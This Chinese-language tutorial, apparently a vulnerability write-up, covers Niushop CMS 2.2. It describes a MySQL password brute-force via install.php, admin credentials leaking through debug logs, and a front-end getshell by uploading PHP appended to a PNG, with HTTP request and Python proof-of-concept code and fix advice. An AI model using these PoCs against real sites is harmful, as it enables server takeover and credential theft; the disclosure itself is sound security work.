某CMS最新版本测试全过程(前台Getshell)教学文档<\/h1>

0x00 环境准备<\/h2>

测试环境<\/h3>

操作系统：MacOS 10.14<\/li>

工具：

MAMP Pro (本地服务器环境)<\/li>
BurpSuite (抓包和测试工具)<\/li>

FileMonitor (文件监控工具)<\/li> <\/ul> <\/li> <\/ul>

目标系统<\/h3>

CMS名称：牛商CMS<\/li>
版本：单商户2.2版<\/li>

下载地址：http:\/\/www.niushop.com.cn\/download.html<\/li> <\/ul>

0x01 安装测试<\/h2>

安装过程分析<\/h3>

使用FileMonitor监控安装过程中的文件变化<\/li>
每个安装步骤的数据包都通过BurpSuite的Repeater保存一份<\/li>

重点关注安装过程中的关键数据包<\/li> <\/ol>

发现漏洞：MySQL密码爆破<\/h3>

漏洞位置<\/strong>：install.php<\/li>
漏洞原理<\/strong>：在判断install.lock文件是否存在之前就进行数据库验证，不受install.lock的影响<\/li>

POC<\/strong>：<\/li> <\/ul>
GET<\/span> \/install.php?action=true&dbserver=127.0.0.1&dbpassword=yourpassword&dbusername=root&dbname=niushop_b2c HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 127.0.0.1<\/span> <\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Android 9.0; Mobile; rv:61.0) Gecko\/61.0 Firefox\/61.0<\/span> <\/span><\/span>Accept:<\/span> *\/*<\/span> <\/span><\/span>Accept-Language:<\/span> en<\/span> <\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span> <\/span><\/span>Referer:<\/span> http:\/\/127.0.0.1\/install.php?refresh<\/span> <\/span><\/span>X-Requested-With:<\/span> XMLHttpRequest<\/span> <\/span><\/span>Connection:<\/span> close<\/span> <\/span><\/span>Cookie:<\/span> action=db<\/span> <\/span><\/span><\/code><\/pre> 返回值<\/strong>：密码正确返回1<\/li> 密码错误返回0<\/li> <\/ul> <\/li> <\/ul> 0x02 后台测试<\/h2> 后台登录测试<\/h3> 将登录数据包发送到Repeater进行多次发送<\/li> 测试验证码等限制<\/li> 确认后台登录可爆破<\/li> <\/ol> 发现漏洞：敏感日志泄露<\/h3> 日志路径<\/strong>：\/runtime\/log\/年月\/日.log<\/code> 示例：http:\/\/host.com\/runtime\/log\/201901\/03.log<\/code><\/li> <\/ul> <\/li> 泄露内容<\/strong>：管理登录账号密码<\/li> 原因<\/strong>：app_debug模式默认为true，会写出调试日志<\/li> 修复建议<\/strong>：将app_debug修改为false<\/li> <\/ul> 文件上传测试<\/h3> 尝试直接上传php文件 - 失败<\/li> 尝试修改图片为php上传 - 失败<\/li> 上传正常图片后修改数据包 - 成功<\/li> <\/ol> 发现漏洞：前台Getshell<\/h3> 利用方法<\/strong>：<\/p> 使用Photoshop生成一张尺寸最小的图片(约64个字节)<\/li> 将php文件追加到图片后面<\/li> <\/ol> Windows: type phpinfo.php >> poc.png<\/code><\/li> MacOS\/Linux: cat phpinfo.php >> poc.png<\/code><\/li> <\/ul> 上传修改后的文件<\/li> <\/ol> <\/li> 关键点<\/strong>：<\/p> 后台没有后缀限制<\/li> 上传成功后的新文件后缀是从源文件中取出的，导致后缀可控<\/li> 即使删除Cookie也可继续上传<\/li> 文件以hash命名，但可通过日志泄露查找shell地址<\/li> <\/ul> <\/li> <\/ul> 0x03 代码分析<\/h2> MySQL密码爆破漏洞代码<\/h3> 位于install.php第38到62行：<\/p> if<\/span>($_GET['action'<\/span>]){ <\/span><\/span> $dbserver =<\/span> $_GET['dbserver'<\/span>]; <\/span><\/span> $dbusername =<\/span> $_GET['dbusername'<\/span>]; <\/span><\/span> $dbpassword =<\/span> $_GET['dbpassword'<\/span>]; <\/span><\/span> $dbname =<\/span> $_GET['dbname'<\/span>]; <\/span><\/span> $link =<\/span> mysql_connect<\/span>($dbserver, $dbusername, $dbpassword); <\/span><\/span> $query =<\/span> mysql_query<\/span>("SHOW DATABASES LIKE '<\/span>{<\/span>$dbname}<\/span>'"<\/span>); <\/span><\/span> var_dump<\/span>($query); <\/span><\/span> if<\/span>(mysql_fetch_assoc<\/span>($query) !=<\/span> false<\/span>){ <\/span><\/span> echo<\/span> 1<\/span>; <\/span><\/span> exit<\/span>(); <\/span><\/span> }else<\/span>{ <\/span><\/span> echo<\/span> 0<\/span>; <\/span><\/span> exit<\/span>(); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>敏感日志泄露代码<\/h3> 位于application\/admin\/controller\/index.php第40到68行：<\/p> public<\/span> function<\/span> index<\/span>() { <\/span><\/span> $debug =<\/span> config<\/span>('app_debug'<\/span>) ==<\/span> true<\/span> ?<\/span> '开发者模式'<\/span> :<\/span> '部署模式'<\/span>; <\/span><\/span> $this-><\/span>assign<\/span>('debug'<\/span>, $debug); <\/span><\/span> \/\/ ...其他代码... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>前台Getshell代码<\/h3> 位于application\/admin\/controller\/Upload.php第556到568行：<\/p> \/\/ 验证文件 <\/span><\/span><\/span><\/span>if<\/span> (!<\/span> $this-><\/span>validationFile<\/span>()) { <\/span><\/span> return<\/span> $this-><\/span>ajaxFileReturn<\/span>(); <\/span><\/span>} <\/span><\/span>$guid =<\/span> time<\/span>(); <\/span><\/span>$file_name_explode =<\/span> explode<\/span>("."<\/span>, $this-><\/span>file_name<\/span>); <\/span><\/span>\/\/ 图片名称 <\/span><\/span><\/span><\/span>$suffix =<\/span> count<\/span>($file_name_explode) -<\/span> 1<\/span>; <\/span><\/span>$ext =<\/span> $file_name_explode[$suffix]; \/\/ 获取后缀名 <\/span><\/span><\/span>\/\/ 获取原文件名 <\/span><\/span><\/span><\/span>$tmp_array =<\/span> $file_name_explode; <\/span><\/span>unset<\/span>($tmp_array[$suffix]); <\/span><\/span>$file_new_name =<\/span> implode<\/span>("."<\/span>, $tmp_array); <\/span><\/span>$newfile =<\/span> md5<\/span>($file_new_name .<\/span> $guid) .<\/span> '.'<\/span> .<\/span> $ext; <\/span><\/span><\/code><\/pre>0x04 POC编写<\/h2> Python POC<\/h3> import<\/span> requests <\/span><\/span> <\/span><\/span>session =<\/span> requests.<\/span>Session() <\/span><\/span>paramsGet =<\/span> {"s"<\/span>:"\/wap\/upload\/photoalbumupload"<\/span>} <\/span><\/span>paramsPost =<\/span> {"file_path"<\/span>:"upload\/goods\/"<\/span>,"album_id"<\/span>:"30"<\/span>,"type"<\/span>:"1,2,3,4"<\/span>} <\/span><\/span>paramsMultipart =<\/span> [('file_upload'<\/span>, ('themin.php'<\/span>, "<\/span>\x89<\/span>PNG<\/span>\r\n\x1a\n\x00\x00\x00\r<\/span>IHDR<\/span>\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\x0b<\/span>IDAT<\/span>\x08\x99<\/span>c<\/span>\xf8\x0f\x04\x00\x09\xfb\x03\xfd\xe3<\/span>U<\/span>\xf2\x9c\x00\x00\x00\x00<\/span>IEND<\/span>\xae<\/span>B`<\/span>\x82<\/span><?php phpinfo();?>"<\/span>, 'application\/octet-stream'<\/span>))] <\/span><\/span>headers =<\/span> {"Accept"<\/span>:"application\/json, text\/javascript, *\/*; q=0.01"<\/span>,"X-Requested-With"<\/span>:"XMLHttpRequest"<\/span>,"User-Agent"<\/span>:"Mozilla\/5.0 (Android 9.0; Mobile; rv:61.0) Gecko\/61.0 Firefox\/61.0"<\/span>,"Referer"<\/span>:"http:\/\/127.0.0.1\/index.php?s=\/admin\/goods\/addgoods"<\/span>,"Connection"<\/span>:"close"<\/span>,"Accept-Language"<\/span>:"en"<\/span>,"Accept-Encoding"<\/span>:"gzip, deflate"<\/span>} <\/span><\/span>cookies =<\/span> {"action"<\/span>:"finish"<\/span>} <\/span><\/span> <\/span><\/span>response =<\/span> session.<\/span>post("http:\/\/127.0.0.1\/index.php"<\/span>, data=<\/span>paramsPost, files=<\/span>paramsMultipart, params=<\/span>paramsGet, headers=<\/span>headers, cookies=<\/span>cookies) <\/span><\/span>print("Status code: <\/span>%i<\/span>"<\/span> %<\/span> response.<\/span>status_code) <\/span><\/span>print("Response body: <\/span>%s<\/span>"<\/span> %<\/span> response.<\/span>content) <\/span><\/span><\/code><\/pre>使用技巧<\/h3> 将POC中的127.0.0.1替换为目标地址<\/li> 可以使用Burp插件scriptgen-burp-plugin-6.jar<\/code>快速生成POC<\/li> <\/ol> 0x05 修复建议<\/h2> MySQL密码爆破<\/strong>：<\/p> 调整install.php代码位置，先检查install.lock文件<\/li> 或直接删除install.php文件<\/li> <\/ul> <\/li> 敏感日志泄露<\/strong>：<\/p> 将app_debug修改为false<\/li> 限制日志目录的访问权限<\/li> <\/ul> <\/li> 前台Getshell<\/strong>：<\/p> 严格限制上传文件的后缀名<\/li> 检查文件内容而不仅仅是文件头<\/li> 对上传文件进行重命名时固定安全后缀<\/li> <\/ul> <\/li> 通用建议<\/strong>：<\/p> 加强安装过程的验证机制<\/li> 对敏感操作增加权限验证<\/li> 定期进行安全审计<\/li> <\/ul> <\/li> <\/ol>